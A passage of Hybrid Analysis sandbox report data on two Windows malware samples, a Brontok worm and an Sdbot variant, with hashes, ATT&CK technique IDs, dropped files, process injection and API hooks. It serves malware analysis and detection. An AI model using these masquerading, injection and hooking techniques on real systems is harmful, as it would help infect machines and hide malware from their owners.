file \"services.exe\" as malicious (classified as \"Worm.Brontok\" with 68% detection rate)\n 15/22 Antivirus vendors marked dropped file \"lsass.exe\" as malicious (classified as \"Worm.Brontok\" with 68% detection rate)\n 15/22 Antivirus vendors marked dropped file \"IExplorer.exe\" as malicious (classified as \"Worm.Brontok\" with 68% detection rate)\n 15/22 Antivirus vendors marked dropped file \"4k51k4.exe\" as malicious (classified as \"Worm.Brontok\" with 68% detection rate)\n 15/22 Antivirus vendors marked dropped file \"winlogon.exe\" as malicious (classified as \"Worm.Brontok\" with 68% detection rate)\n 15/22 Antivirus vendors marked dropped file \"smss.exe\" as malicious (classified as \"Worm.Brontok\" with 68% detection rate)\n 15/22 Antivirus vendors marked dropped file \"csrss.exe\" as malicious (classified as \"Worm.Brontok\" with 68% detection rate)\n 15/22 Antivirus vendors marked dropped file \"LSASS.EXE\" as malicious (classified as \"Worm.Brontok\" with 68% detection rate)\n 15/22 Antivirus vendors marked dropped file \"SMSS.EXE\" as malicious (classified as \"Worm.Brontok\" with 68% detection rate)\n 15/22 Antivirus vendors marked dropped file \"SERVICES.EXE\" as malicious (classified as \"Worm.Brontok\" with 68% detection rate)\n 15/22 Antivirus vendors marked dropped file \"WINLOGON.EXE\" as malicious (classified as \"Worm.Brontok\" with 68% detection rate)\n 15/22 Antivirus vendors marked dropped file \"CSRSS.EXE\" as malicious (classified as \"Worm.Brontok\" with 68% detection rate)", "origin": "Binary File", "attck_id": "T1204.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1204/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "api-31", "type": 6, "relevance": 9, "name": "Tries to access unusual system drive letters", "description": "\"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" touched \"K:\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" touched \"L:\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" touched \"M:\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" touched \"N:\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" touched \"O:\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" touched \"P:\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" touched \"Q:\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" touched \"R:\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" touched \"S:\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" touched \"T:\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" touched \"U:\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" touched \"V:\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" touched \"W:\"", "origin": "API Call", "attck_id": "T1120", "attck_id_wiki": "https://attack.mitre.org/techniques/T1120"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "target-14", "type": 9, "relevance": 8, "name": "Spawns a lot of processes", "description": "Spawned process \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" (UID: 00000000-00006024)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00005832)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00004312)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00006128)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00004140)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00004304)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00005992)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00005932)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00003572)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00002744)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00003560)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00003780)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00002632)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00002660)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00004456)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00003556)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00004224)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00004404)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00001200)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00002236)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00002044)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00001880)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00004380)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00002644)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00004396)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00002852)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00004128)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00004356)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00004204)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00003856)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00003588)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00003660)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00003252)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00003260)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00003256)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00003516)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00001420)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00003296)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00000476)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00000596)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00000700)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00001332)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00004488)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00001480)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00002916)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00000956)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00001616)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00003968)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00000900)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00001784)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00000876)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00002572)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00003344)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00004036)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\4k51k4.exe\" (Handle: 376)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\4k51k4.exe\" (Handle: 376)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\4k51k4.exe\" (Handle: 376)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 416)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 416)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 416)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 376)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 376)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 376)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 416)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 416)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 416)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 376)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 376)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 376)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 416)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 416)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 416)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\" (Handle: 376)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\" (Handle: 376)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\" (Handle: 376)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\4k51k4.exe\" (Handle: 600)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\4k51k4.exe\" (Handle: 600)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\4k51k4.exe\" (Handle: 600)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 608)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 608)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 608)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 608)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 608)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 608)\n \"4k51k4.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\4k51k4.exe\" (Handle: 372)\n \"4k51k4.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\4k51k4.exe\" (Handle: 372)\n \"4k51k4.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\4k51k4.exe\" (Handle: 372)\n \"4k51k4.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 416)\n \"4k51k4.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 416)\n \"4k51k4.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 416)\n \"4k51k4.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 372)\n \"4k51k4.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 372)\n \"4k51k4.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 372)\n \"4k51k4.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 416)\n \"4k51k4.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 416)\n \"4k51k4.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 416)\n \"4k51k4.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 372)\n \"4k51k4.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 372)\n \"4k51k4.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 372)\n \"4k51k4.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 416)\n \"4k51k4.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 416)\n \"4k51k4.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 416)\n \"4k51k4.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\" (Handle: 372)\n \"4k51k4.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\" (Handle: 372)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-20", "type": 6, "relevance": 7, "name": "Allocates virtual memory in a remote process", "description": "\"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" allocated memory in \"C:\\50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\"\n \"4k51k4.exe\" allocated memory in \"%WINDIR%\\4k51k4.exe\"\n \"WINLOGON.EXE\" allocated memory in \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\"\n \"CSRSS.EXE\" allocated memory in \"%APPDATA%\\WINDOWS\\CSRSS.EXE\"\n \"SERVICES.EXE\" allocated memory in \"%APPDATA%\\WINDOWS\\SERVICES.EXE\"\n \"LSASS.EXE\" allocated memory in \"%APPDATA%\\WINDOWS\\LSASS.EXE\"\n \"SMSS.EXE\" allocated memory in \"%APPDATA%\\WINDOWS\\SMSS.EXE\"", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "target-33", "type": 9, "relevance": 10, "name": "Creates a fake system process", "description": "Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00004304)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00005992)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00003572)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00003560)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00003780)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00002632)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00002660)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00003556)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00004224)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00004404)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00002236)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00001880)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00004380)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00004396)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00003856)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00003588)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00003660)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00003252)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00003260)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00003256)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00003516)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00001420)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00003296)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00000476)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00000700)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00001332)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00004488)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00002916)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00000956)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00001616)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00003968)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00000900)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00001784)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00000876)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00002572)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00003344)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00004036)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00001724)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00001184)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00002404)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00003496)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00001980)", "origin": "Monitored Target", "attck_id": "T1036.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/005"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "hooks-2", "type": 11, "relevance": 10, "name": "Hooks file system APIs", "description": "\"FindFirstFileW@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"FindNextFileW@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"FindNextFileA@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"FindNextFileW@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"FindNextFileA@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"SMSS.EXE\"\n \"FindNextFileW@KERNEL32.DLL\" in \"SMSS.EXE\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"SMSS.EXE\"\n \"FindNextFileA@KERNEL32.DLL\" in \"SMSS.EXE\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"CSRSS.EXE\"\n \"FindNextFileW@KERNEL32.DLL\" in \"CSRSS.EXE\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"CSRSS.EXE\"\n \"FindNextFileA@KERNEL32.DLL\" in \"CSRSS.EXE\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"LSASS.EXE\"\n \"FindNextFileW@KERNEL32.DLL\" in \"LSASS.EXE\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"LSASS.EXE\"\n \"FindNextFileA@KERNEL32.DLL\" in \"LSASS.EXE\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"FindNextFileW@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"FindNextFileA@KERNEL32.DLL\" in \"SERVICES.EXE\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Spyware/Information Retrieval", "identifier": "hooks-5", "type": 11, "relevance": 10, "name": "Hooks internet related APIs", "description": "\"send@WS2_32.DLL\" in \"IExplorer.exe\"\n \"send@WS2_32.DLL\" in \"WINLOGON.EXE\"\n \"send@WS2_32.DLL\" in \"SMSS.EXE\"\n \"send@WS2_32.DLL\" in \"CSRSS.EXE\"\n \"send@WS2_32.DLL\" in \"LSASS.EXE\"\n \"send@WS2_32.DLL\" in \"SERVICES.EXE\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c
https://hybrid-analysis.com/sample/f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c
Hybrid Analysis - Killers
{"size": 653052, "type": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "submit_name": "f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c", "sha256": "f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c", "av_detect": 89, "vx_family": "Sdbot.Generic", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 3, "total_signatures": 197, "extracted_files": [{"name": "r2473.bat", "file_path": "%TEMP%\\r2473.bat", "file_size": 238, "sha256": "db165ec911bb2709ba0f902a795c91e032ad25086a95c702ffed26a2d1359e26", "type_tags": ["text"], "description": "DOS batch file, ASCII text, with CRLF line terminators", "runtime_process": "f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe (PID: 5940)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "regsrv32.exe", "file_path": "%WINDIR%\\System32\\regsrv32.exe", "file_size": 669459, "sha256": "f6a3ddbd39c0f6a5400cb6c56a7f0e7a01b555fdc0dccec54e647a886d16566e", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe (PID: 5940)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "REGSRV32.EXE.67A9C472.bin", "file_size": 669459, "sha256": "f6a3ddbd39c0f6a5400cb6c56a7f0e7a01b555fdc0dccec54e647a886d16566e", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "processes": [{"uid": "00000000-00005940", "name": "f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe", "normalized_path": "C:\\f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe", "sha256": "f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c", "av_label": "Generic.Sdbot", "av_matched": 15, "av_total": 22}, {"uid": "00000000-00006004", "parentuid": "00000000-00005940", "name": "regsrv32.exe", "normalized_path": "%WINDIR%\\system32\\regsrv32.exe", "sha256": "f6a3ddbd39c0f6a5400cb6c56a7f0e7a01b555fdc0dccec54e647a886d16566e"}, {"uid": "00000000-00004236", "parentuid": "00000000-00005940", "name": "cmd.exe", "normalized_path": "%WINDIR%\\system32\\cmd.exe", "command_line": "/c \"\"%TEMP%\\r2473.bat\" \"", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}], 